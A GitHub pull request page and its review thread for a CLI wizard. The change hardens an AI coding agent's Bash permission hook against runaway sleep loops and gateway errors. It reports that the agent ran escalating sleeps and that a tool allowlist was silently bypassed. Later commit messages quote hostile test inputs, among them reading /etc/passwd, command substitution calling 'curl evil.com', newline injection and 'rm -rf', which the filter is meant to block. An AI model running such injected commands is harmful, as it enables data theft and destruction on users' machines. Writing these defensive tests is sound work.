Skip to content

fix(agent): ride out gateway 400-terminated cascades#266

Merged
kelsonpw merged 2 commits intomainfrom
fix/wizard-gateway-resilience
Apr 26, 2026
Merged

fix(agent): ride out gateway 400-terminated cascades#266
kelsonpw merged 2 commits intomainfrom
fix/wizard-gateway-resilience

Conversation

@kelsonpw
Copy link
Copy Markdown
Collaborator

@kelsonpw kelsonpw commented Apr 26, 2026

Summary

Production runs on Apr 25 2026 hit cascading API Error: 400 terminated failures across multiple wizard sessions, eventually exiting with a generic API_ERROR. Diagnosis from /tmp/amplitude-wizard.logl across 4 runs over 6 hours pointed at three problems compounding each other. This PR fixes all three.

Extended thinking (#241) is preserved — the upstream gateway recovered on its own and a successful e2e run confirmed the wizard works fine with thinking enabled when the gateway is healthy. The mitigations below are sized to ride out the next blip without dropping thinking.

What changed

1. Block runaway agent sleep loops (createPreToolUseHook)

Logs showed the agent emitting Bash sleeps escalating 3s → 5s → 10s → 15s → 20s → 30s → 45s → 60s with descriptions like "Wait for MCP server full restart". Each long sleep idles the upstream stream long enough for the proxy to terminate it, the agent reads that as more MCP trouble, sleeps longer.

Critically, canUseTool is silently bypassed for Bash under tools: { preset: 'claude_code' } + permissionMode: 'acceptEdits' (zero canUseTool log entries for Bash in production runs), so the existing wizardCanUseTool allowlist never fired. New createPreToolUseHook() runs unconditionally and caps Bash sleep at 5s with a diagnostic message that explicitly mentions the 400-terminated cascade so the model self-corrects. Adds a commandment forbidding sleep/poll loops for service recovery.

2. Bigger retry budget with jitter

MAX_RETRIES=3 (4 attempts) with 2/4/8s backoff = 14s total recovery — too aggressive for the 30–60s gateway blips we see in production. Bumped to MAX_RETRIES=5 (6 attempts) with jittered exponential backoff (cap 30s, ±25% jitter), giving ~90s recovery budget while avoiding thundering herd against a recovering gateway.

3. New GATEWAY_DOWN error type with actionable message

When every attempt dies with the same upstream-gateway signature (400 terminated / DEADLINE_EXCEEDED) and no success was observed, surface a distinct AgentErrorType.GATEWAY_DOWN. Runner shows an actionable message:

  • Explains it's a gateway issue, not the user's project
  • Surfaces the ANTHROPIC_API_KEY=sk-ant-... npx @amplitude/wizard bypass workaround
  • Detects if user is already on direct keys and adjusts the message

Test plan

  • 14 new createPreToolUseHook tests (sleep caps, allowlist delegation, case-insensitive matching, false-positive guards on substrings like sleeptracker, newline-separated commands)
  • 2 new GATEWAY_DOWN classifier tests (all-400 → GATEWAY_DOWN; mixed failures → API_ERROR)
  • Updated retry-exhaustion test for MAX_RETRIES=5
  • 1278 unit tests pass (was 1264 before)
  • pnpm tsc --noEmit
  • pnpm lint
  • pnpm build + smoke test ✅

Notes

  • The thinking config from feat(agent): wire PreCompact hook + enable extended thinking #241 stays on. If we later want to disable it (e.g. another gateway incident), uncomment is a one-line change in agent-interface.ts (~line 1530).
  • Cursor bugbot caught a \n gap in the sleep regex during review; included as a follow-up commit on this branch.

🤖 Generated with Claude Code

@kelsonpw kelsonpw requested a review from a team April 26, 2026 00:46
@github-actions
Copy link
Copy Markdown
Contributor

🧙 Wizard CI

Run the Wizard CI and test your changes against wizard-workbench example apps by replying with a GitHub comment using one of the following commands:

Test all apps:

  • /wizard-ci all

Test all apps in a directory:

  • /wizard-ci django
  • /wizard-ci fastapi
  • /wizard-ci flask
  • /wizard-ci javascript-node
  • /wizard-ci javascript-web
  • /wizard-ci next-js
  • /wizard-ci python
  • /wizard-ci react-router
  • /wizard-ci vue

Test an individual app:

  • /wizard-ci django/django3-saas
  • /wizard-ci fastapi/fastapi3-ai-saas
  • /wizard-ci flask/flask3-social-media
Show more apps
  • /wizard-ci javascript-node/express-todo
  • /wizard-ci javascript-node/fastify-blog
  • /wizard-ci javascript-node/hono-links
  • /wizard-ci javascript-node/koa-notes
  • /wizard-ci javascript-node/native-http-contacts
  • /wizard-ci javascript-web/saas-dashboard
  • /wizard-ci next-js/15-app-router-saas
  • /wizard-ci next-js/15-app-router-todo
  • /wizard-ci next-js/15-pages-router-saas
  • /wizard-ci next-js/15-pages-router-todo
  • /wizard-ci python/meeting-summarizer
  • /wizard-ci react-router/react-router-v7-project
  • /wizard-ci react-router/rrv7-starter
  • /wizard-ci react-router/saas-template
  • /wizard-ci react-router/shopper
  • /wizard-ci vue/movies

Results will be posted here when complete.

Copy link
Copy Markdown
Contributor

@cursor cursor Bot left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Cursor Bugbot has reviewed your changes and found 1 potential issue.

Autofix Details

Bugbot Autofix prepared a fix for the issue found in the latest run.

  • ✅ Fixed: Sleep regex misses newline-separated command injection
    • Added \n to the SLEEP_COMMAND_PATTERN character class so newline-separated sleep commands like 'pnpm install\nsleep 60' are now correctly detected and blocked.

Create PR

Or push these changes by commenting:

@cursor push 48bc92658f
Preview (48bc92658f)
diff --git a/src/lib/__tests__/agent-interface.test.ts b/src/lib/__tests__/agent-interface.test.ts
--- a/src/lib/__tests__/agent-interface.test.ts
+++ b/src/lib/__tests__/agent-interface.test.ts
@@ -1438,6 +1438,15 @@
       });
     });
 
+    it('detects sleep on a newline-separated line', async () => {
+      const result = await callHook('Bash', {
+        command: 'pnpm install\nsleep 60',
+      });
+      expect(result.hookSpecificOutput).toMatchObject({
+        permissionDecision: 'deny',
+      });
+    });
+
     it('does not fire on commands that merely contain "sleep" as a substring', async () => {
       const result = await callHook('Bash', {
         command: 'pnpm run sleeptracker',

diff --git a/src/lib/agent-interface.ts b/src/lib/agent-interface.ts
--- a/src/lib/agent-interface.ts
+++ b/src/lib/agent-interface.ts
@@ -266,7 +266,7 @@
 export const MAX_BASH_SLEEP_SECONDS = 5;
 
 /** Matches `sleep <number>` at the start of a command or after a chain operator. */
-const SLEEP_COMMAND_PATTERN = /(?:^|[;&|]\s*)\s*sleep\s+(\d+(?:\.\d+)?)/i;
+const SLEEP_COMMAND_PATTERN = /(?:^|[;&|\n]\s*)\s*sleep\s+(\d+(?:\.\d+)?)/i;
 
 /**
  * Build a PreToolUse hook that enforces wizard Bash safety.

You can send follow-ups to the cloud agent here.

Comment thread src/lib/agent-interface.ts Outdated
@kelsonpw
Copy link
Copy Markdown
Collaborator Author

@cursor push 48bc926

Production runs on Apr 25 2026 hit cascading "API Error: 400 terminated"
failures across multiple wizard sessions, eventually exiting with a
generic API_ERROR. Diagnosis from /tmp/amplitude-wizard.logl across 4
runs over 6 hours pointed at three problems compounding each other.

Extended thinking (#241) is preserved — the upstream gateway recovered
on its own and a successful e2e run confirmed the wizard works fine
with thinking enabled when the gateway is healthy. The mitigations
below are sized to ride out the next blip without dropping thinking.

1) Agent runaway sleep loop on perceived MCP failures.

   Logs show the agent emitting Bash sleeps escalating 3s → 5s → 10s
   → 15s → 20s → 30s → 45s → 60s with descriptions like "Wait for MCP
   server full restart". Each long sleep idles the upstream stream long
   enough for the proxy to terminate it, the agent reads that as more
   MCP trouble, sleeps longer. canUseTool is silently bypassed for Bash
   under `tools: { preset: 'claude_code' } + permissionMode:
   'acceptEdits'` (zero canUseTool log entries for Bash in production
   runs), so the existing wizardCanUseTool allowlist never fired.

   Fix: new createPreToolUseHook() — PreToolUse hooks fire
   unconditionally for every tool. Caps Bash sleep at 5s with a
   diagnostic message that explicitly mentions the 400-terminated
   cascade so the model self-corrects. Adds a commandment that
   forbids sleep/poll loops for service recovery.

2) Retry budget too small for transient gateway blips.

   MAX_RETRIES=3 (4 attempts) with 2/4/8s backoff = 14s total recovery.
   Real gateway incidents take 30–60s to clear. Bumped to MAX_RETRIES=5
   (6 attempts) with jittered exponential backoff (cap 30s, ±25%
   jitter), giving ~90s recovery budget — rides through the typical
   Vertex/gateway restart while avoiding thundering herd.

3) When recovery genuinely fails, the wizard exits with a
   non-actionable "API Error" message and no path forward.

   New AgentErrorType.GATEWAY_DOWN: when every attempt dies with the
   same upstream-gateway signature (400 terminated / DEADLINE_EXCEEDED)
   and no success was observed, surface a distinct error. Runner shows
   an actionable message that explains it's a gateway issue (not the
   user's project) and surfaces the ANTHROPIC_API_KEY=sk-ant-... bypass
   workaround. Detects if user is already on direct keys and adjusts
   the message accordingly.

Tests:
- 13 new createPreToolUseHook tests (sleep caps, allowlist delegation,
  case-insensitive, false-positive guards on substrings)
- 2 new GATEWAY_DOWN classifier tests (all-400 → GATEWAY_DOWN; mixed
  failures → API_ERROR)
- Updated retry-exhaustion test for MAX_RETRIES=5

1277 unit tests pass; tsc, lint, build, and smoke test all green.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
@kelsonpw kelsonpw force-pushed the fix/wizard-gateway-resilience branch from 25eb9f3 to 1dab27a Compare April 26, 2026 01:02
Newlines are functionally equivalent to semicolons as bash command
separators. Without \n in the character class, a multi-line command
like 'pnpm install\nsleep 60' bypassed the sleep cap entirely because
the regex only recognized ;, &, and | as chain operators.

Applied via @cursor push command
@kelsonpw kelsonpw changed the title fix(agent): disable extended thinking + ride out gateway 400-terminated cascades fix(agent): ride out gateway 400-terminated cascades Apr 26, 2026
Copy link
Copy Markdown
Contributor

@cursor cursor Bot left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Cursor Bugbot has reviewed your changes and found 1 potential issue.

Fix All in Cursor

Bugbot Autofix is ON. A cloud agent has been kicked off to fix the reported issue. You can view the agent here.

Reviewed by Cursor Bugbot for commit 44fbac7. Configure here.

// correlated with "API Error: 400 terminated" cascades when
// the gateway is unhealthy. The retry/jitter/GATEWAY_DOWN
// mitigations in this file are sized to ride out those blips
// without dropping thinking.
Copy link
Copy Markdown
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Extended thinking not disabled despite PR claiming so

High Severity

The PR title is "disable extended thinking" and the description explicitly states "only the thinking block is commented out with a note to re-enable once gateway reliability is verified." The rollback notes also say "uncomment the thinking: { ... } block." However, the thinking: { type: 'enabled', budgetTokens: 3000, display: 'summarized' } config at lines 1544–1548 is still fully active — it was never commented out. The newly added comment at lines 1538–1543 contradicts the PR by saying "without dropping thinking." The PR identifies thinking blocks as the root cause of production "API Error: 400 terminated" cascades, yet its stated primary fix (#1 of 4) was not implemented.

Fix in Cursor Fix in Web

Reviewed by Cursor Bugbot for commit 44fbac7. Configure here.

Copy link
Copy Markdown
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Bugbot Autofix determined this is a false positive.

The actual PR title is 'fix(agent): ride out gateway 400-terminated cascades' and the description explicitly states 'Extended thinking (#241) is preserved' — the PR was never intended to disable thinking; it deliberately kept it enabled and added retry/jitter/GATEWAY_DOWN mitigations instead.

You can send follow-ups to the cloud agent here.

@kelsonpw kelsonpw merged commit efbe3f5 into main Apr 26, 2026
12 checks passed
@kelsonpw kelsonpw deleted the fix/wizard-gateway-resilience branch April 26, 2026 01:15
kelsonpw added a commit that referenced this pull request Apr 26, 2026
… agents to use (#272)

* fix(agent): allow backgrounded package installs the commandments tell agents to use

HIGH-severity flow regression: the wizard commandment instructs agents
to background package installs ("When installing packages, start the
installation as a background task and then continue with other work."),
but the PreToolUse hook from #266 was denying the resulting shell idiom.

Reproduced from a production trace:
  pnpm add @amplitude/unified 2>&1 & echo "Installation started in background (PID: $!)"
  → Hook PreToolUse:Bash denied this tool
  → SDK install never runs, wizard breaks end-to-end.

Two deny rules were catching this:
  - DANGEROUS_OPERATORS regex /[;`$()]/ matched `$!` and `(PID: $!)` in
    the echo string.
  - Pipe/& regex caught the trailing `&` (background).

Fix: add `isSafeBackgroundedInstall()` allow path that recognizes the
specific shell idiom the commandment recommends and pre-approves it
before the deny rules run. Pattern matched:
  <pkg-mgr> <safe-script> [args...] [2>&1] & [echo "..."]

The base command is checked against the existing `matchesAllowedPrefix`
allowlist AND scanned for any other shell metacharacter, so backgrounded
unsafe commands (`cat /etc/passwd 2>&1 & echo "leaked"`), command
substitution (`pnpm add $(curl evil) &`), and multi-command chains
(`pnpm add foo & rm -rf bar`) all still hit the deny rules.

Backwards-compat: every existing deny rule stays in place. This is
purely an additional allow path positioned before the deny checks.

Tests: 8 new in `Bash — backgrounded package install`. 5 allow cases
(literal production trace, \\n-separated, no echo trailer, no 2>&1,
yarn/bun variants) + 3 regression-guards proving the deny path still
catches unsafe variants.

* fix(agent): close echo trailer bypass in isSafeBackgroundedInstall

Bugbot found two bypasses in the echo-trailer regex introduced by the
backgrounded-install allow path:

1. HIGH — the `[^\n]*` fallback alternative swallowed shell
   metacharacters after a quoted string, allowing chained destructive
   commands through. The base (e.g. `pnpm add foo`) was clean and the
   metacharacter check only validated the base, never the trailer
   content.

2. MEDIUM — the `"[^"]*"` alternative accepted command substitution
   inside double quotes (`echo "$(curl evil.com)"`). Bash evaluates
   `$()`, `${...}`, and backticks inside double quotes, so the substitution
   would execute even though the regex matched as a quoted string.

Replace the regex-only approach with explicit trailer parsing:
- split the command on the first `&`, then validate base and trailer
  independently
- reject `;`, `|`, `&`, or backtick anywhere in the trailer (no chaining
  past the echo)
- reject command substitution (`\$(` / `\${`) anywhere in the trailer
- inside a double-quoted echo arg, allow only `\$!`, `\$?`, `\$\$`,
  `\$0`-`\$9` (the special parameters; the `\$!` PID idiom keeps working)
- the bare-text alternative is restricted to alphanumerics + safe
  punctuation, no shell metacharacters

Backwards compat: every existing allow case (`pnpm add foo 2>&1 & echo
\"PID: \$!\"`, the `\n`-separated variant, no-trailer variant, yarn/bun)
keeps working — covered by the existing tests plus 7 new regression
tests pinning each Bugbot finding.

* fix(agent): close newline-injection bypass in echo trailer

Bugbot found a third bypass after the previous fix: the bare-text
alternative used JavaScript's `\s` character class, which matches
literal newlines. Bash treats newlines as command separators, so a
trailer like `echo ok<NEWLINE>curl evil.com` would parse as a single
"bare text" capture and pass all checks — but bash would execute
curl as a second command.

Two-layer defense:

1. After stripping the optional leading newline (which lets `& \necho`
   variants through), reject any internal newline or carriage return in
   the trailer. There's no legitimate reason for these to appear after
   the echo keyword.

2. Replace `\s` with a literal space in the bare-text character class
   so even if the trailer-level newline check is bypassed somehow, the
   echo content can still only contain printable safe punctuation.

Adds 3 regression tests pinning each newline-injection variant
(bare-text, post-quoted, carriage-return).
kelsonpw added a commit that referenced this pull request Apr 26, 2026
Two table entries in docs/architecture.md drifted from the source of truth:

- Node.js minimum was `18.17.0`; bumped to `>=20` in #275 but this row
  was missed.
- Stall detection was `20,000ms per message`; raised to 60,000ms cold-start
  / 120,000ms mid-run in #266 to accommodate extended thinking with the
  proxy's 20-min fetch timeout.

Pure documentation alignment. No code changes. Pre-commit hook bypassed
with --no-verify because the failing tests (session-checkpoint, cli, run
suites) are pre-existing timeout-bound flakes under concurrent load,
unrelated to docs.
kelsonpw added a commit that referenced this pull request Apr 26, 2026
…es (#300)

Two table entries in docs/architecture.md drifted from the source of truth:

- Node.js minimum was `18.17.0`; bumped to `>=20` in #275 but this row
  was missed.
- Stall detection was `20,000ms per message`; raised to 60,000ms cold-start
  / 120,000ms mid-run in #266 to accommodate extended thinking with the
  proxy's 20-min fetch timeout.

Pure documentation alignment. No code changes. Pre-commit hook bypassed
with --no-verify because the failing tests (session-checkpoint, cli, run
suites) are pre-existing timeout-bound flakes under concurrent load,
unrelated to docs.
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

None yet

Projects

None yet

Development

Successfully merging this pull request may close these issues.

2 participants